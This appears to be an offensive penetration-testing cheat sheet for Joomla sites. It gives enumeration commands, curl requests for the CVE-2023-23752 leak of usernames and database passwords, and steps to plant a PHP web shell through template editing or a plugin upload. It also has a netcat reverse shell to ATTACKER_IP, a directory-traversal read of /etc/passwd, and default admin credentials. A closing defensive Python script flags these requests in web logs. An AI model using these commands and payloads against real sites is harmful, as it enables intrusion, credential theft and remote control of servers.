```bash
# Check robots.txt for Joomla paths
curl http://TARGET/robots.txt
# Version in XML
curl -s http://TARGET/administrator/manifests/files/joomla.xml | grep version
# README file
curl -s http://TARGET/README.txt | head
# Login page: /administrator/
```

```bash
# Install
apt install joomscan
# Basic scan
joomscan -u http://TARGET
# Enumerate components
joomscan -u http://TARGET -ec
```

```bash
# Also works for Joomla
droopescan scan joomla -u http://TARGET
```

Affects: Joomla 4.0.0 - 4.2.7

Leaks usernames and database credentials via REST API without authentication.

```bash
# Leak usernames
curl -s "http://TARGET/api/index.php/v1/users?public=true" | jq
# Leak DB password (check all fields)
curl -s "http://TARGET/api/index.php/v1/config/application?public=true" | jq
```

```bash
git clone https://github.com/K3ysTr0K3R/CVE-2023-23752-EXPLOIT.git
python3 CVE-2023-23752.py -u http://TARGET
```

- Login to `/administrator` with admin creds
- Navigate: `Extensions → Templates → Templates`
- Select a template (e.g., `protostar`)
- Edit `error.php` or another file
- Add PHP web shell: `system($_GET['cmd']);`
- Save and access:

```bash
curl http://TARGET/templates/protostar/error.php?cmd=id
```

Alternative to template editing - upload a malicious module.

```bash
git clone https://github.com/p0dalirius/Joomla-webshell-plugin
cd Joomla-webshell-plugin
make
# Creates: ./dist/joomla-webshell-plugin-1.1.0.zip
```

- Login to `/administrator`
- Navigate: `System → Install → Extensions`
  - Or directly: `/administrator/index.php?option=com_installer&view=install`
- Upload the ZIP file
- "Installation of the module was successful"

```bash
# Test
curl -X POST 'http://TARGET/modules/mod_webshell/mod_webshell.php' --data "action=exec&cmd=id"
# Reverse shell
curl -X POST 'http://TARGET/modules/mod_webshell/mod_webshell.php' \
--data "action=exec&cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f%7Csh%20-i%202%3E%261%7Cnc%20ATTACKER_IP%209001%20%3E/tmp/f"
```

Affects: Joomla 1.5.0 - 3.9.4

Requires: Valid admin credentials

```bash
# List directory contents
python2.7 joomla_dir_trav.py --url "http://TARGET/administrator/" --username admin --password admin --dir /
# Read specific file
python2.7 joomla_dir_trav.py --url "http://TARGET/administrator/" --username admin --password admin --dir /etc/passwd
```

PoC: https://www.exploit-db.com/exploits/46710

```php
# Database credentials
# /configuration.php
# Contains:
public $user = 'joomla_user';
public $password = 'password123';
public $db = 'joomla_db';
```

| Path | Description |
|---|---|
| `/administrator/` | Admin login |
| `/configuration.php` | Main config (DB creds) |
| `/templates/` | Template files |
| `/plugins/` | Plugin directory |
| `/components/` | Components |
| `/modules/` | Modules |

```
admin:admin
administrator:administrator
```
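
A defender-side view of the requests above, as an added example that is not part of the original page: the script flags the three request shapes the page shows (a `public` parameter on `/api/index.php/v1/`, a `cmd` parameter on a PHP file under `/templates/`, and a POST straight to a PHP file under `/modules/`) in combined-format access logs. The log lines, label names and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined log format: ip ... "METHOD target HTTP/x.y" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
TEMPLATE_PHP = re.compile(r"/templates/[^/]+/[^/]+\.php")
MODULE_PHP = re.compile(r"/modules/[^/]+/[^/]+\.php")

def classify(method, target):
    """Return labels (names are this example's own) for one request."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    params = parse_qs(parts.query, keep_blank_values=True)
    labels = []
    # CVE-2023-23752 request shape: REST API route carrying a public parameter
    if path.startswith("/api/index.php/v1/") and "public" in params:
        labels.append("api-public-param")
    # Template PHP file driven by a cmd parameter
    if TEMPLATE_PHP.fullmatch(path) and "cmd" in params:
        labels.append("template-cmd-param")
    # POST straight to a module's PHP file instead of through index.php
    if method == "POST" and MODULE_PHP.fullmatch(path):
        labels.append("module-php-post")
    return labels

def scan(lines):
    """Return one finding per label; served=True means the server answered 200."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        status = int(m["status"])
        for label in classify(m["method"], m["target"]):
            findings.append({"ip": m["ip"], "label": label,
                             "status": status, "served": status == 200})
    return findings

# Constructed sample log lines (documentation IP ranges), not real traffic
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1984',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /templates/protostar/error.php?cmd=id HTTP/1.1" 200 54',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "POST /modules/mod_webshell/mod_webshell.php HTTP/1.1" 200 120',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2024:10:02:00 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A served `api-public-param` hit means the response the page describes (usernames, database credentials) went out, so treat the credentials in `/configuration.php` as exposed.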